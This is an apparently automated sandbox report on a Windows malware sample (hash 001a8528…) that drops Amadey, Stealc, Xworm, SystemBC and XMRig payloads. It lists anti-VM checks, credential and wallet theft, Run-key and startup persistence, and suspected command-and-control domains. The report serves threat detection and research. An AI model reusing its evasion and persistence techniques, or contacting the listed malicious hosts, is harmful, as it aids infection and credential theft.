Malware Analysis Report

2025-04-03 09:24

Sample ID 250305-2jckjs1rx4
Target 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066
SHA256 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066
Tags
defense_evasion discovery spyware stealer amadey gcleaner healer stealc systembc xmrig xworm 092155 trump credential_access dropper execution loader miner persistence rat trojan
score
10/10

Analysis Overview

Threat Level: Known bad

The file 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066 was found to be: Known bad.

Malicious Activity Summary

xmrig

SystemBC

Stealc family

Stealc

Amadey

GCleaner

Detect Xworm Payload

Healer family

Healer

Xmrig family

Systembc family

Xworm

Detects Healer an antivirus disabler dropper

Xworm family

Gcleaner family

Amadey family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

XMRig Miner payload

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Uses browser remote debugging

Checks BIOS information in registry

Reads user/profile data of local email clients

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Identifies Wine through registry keys

Drops startup file

Loads dropped DLL

Adds Run key to start application

Checks installed software on the system

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Enumerates processes with tasklist

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Browser Information Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

Kills process with taskkill

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious use of UnmapMainImage

Analysis: static1

Detonation Overview

Reported

2025-03-05 22:36

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 22:36

Reported

2025-03-05 22:38

Platform

win7-20240903-en

Max time kernel

120s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe

"C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 1212

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp

Files

memory/2208-0-0x00000000000E0000-0x00000000003EF000-memory.dmp

memory/2208-1-0x00000000773B0000-0x00000000773B2000-memory.dmp

memory/2208-2-0x00000000000E1000-0x0000000000141000-memory.dmp

memory/2208-3-0x00000000000E0000-0x00000000003EF000-memory.dmp

memory/2208-4-0x00000000000E0000-0x00000000003EF000-memory.dmp

memory/2208-5-0x00000000000E0000-0x00000000003EF000-memory.dmp

memory/2208-6-0x00000000000E0000-0x00000000003EF000-memory.dmp

memory/2208-7-0x00000000000E1000-0x0000000000141000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-05 22:36

Reported

2025-03-05 22:38

Platform

win10v2004-20250217-en

Max time kernel

127s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A (2 matches, no indicator, process or target details recorded)

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A (3 matches, no indicator, process or target details recorded)

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\nxpsp\mcsq.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (15 matches, no indicator, process or target details recorded)

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\nxpsp\mcsq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\nxpsp\mcsq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\nxpsp\mcsq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\ProgramData\nxpsp\mcsq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\83c5f6f0d5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107500101\\83c5f6f0d5.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e644351a1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107510101\\5e644351a1.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8c305bd773.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107520101\\8c305bd773.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3277ecaa2a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\3277ecaa2a.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A (2 matches, no indicator, process or target details recorded)

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A (7 invocations)

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
